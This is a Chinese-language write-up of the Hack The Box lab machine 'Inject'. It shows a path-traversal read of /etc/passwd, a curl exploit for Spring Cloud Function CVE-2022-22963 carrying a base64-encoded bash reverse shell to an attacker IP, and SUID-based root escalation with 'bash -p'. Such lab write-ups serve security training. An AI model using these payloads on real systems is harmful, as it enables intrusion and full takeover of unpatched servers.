HTB靶场：简单inject

HTB靶场：简单inject

1、进入靶场，连接后开启靶机 inject

2、nmap扫描一下靶机

nmap -v -A 10.10.11.*

扫描后显示服务和端口信息8080和22

3、打开web服务

1）有上传文件功能 简单上传了几个文件（txt,img等 上传过程根据参数简单测试了rce和注入发现无回显并且不对猜测可能不是此考点、转换思路上传的图片）
2）上传图片会显示路径。
3）看到有路径猜测是否可跨目录文件包含，试后发现有并且有回显

/show_image?img=../../../../../../../etc/passwd

4)包含可直接显示目录 最终找到web目录pom.xml看看有什么依赖

5）知识点 Spel表达式注入（3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2）CVE-2022-22963、直接打的反弹shell的payload

curl -X POST  http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMTEvNjY4OCAwPiYx}|{base64,-d}|{bash,-i} ")' --data-raw 'data' -v

6）以上base64换成自己地址、监听端口6688

7）发现无权限查看目录

8）提权（推荐一个linux提权 https://pentestlab.blog/2017/09/25/suid-executables/）

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
bash -p

发现有bash可用

直接 bash -p 提权成功
9）寻找flag root目录下/

cat /home/phil/user.txt
cat /root/root.txt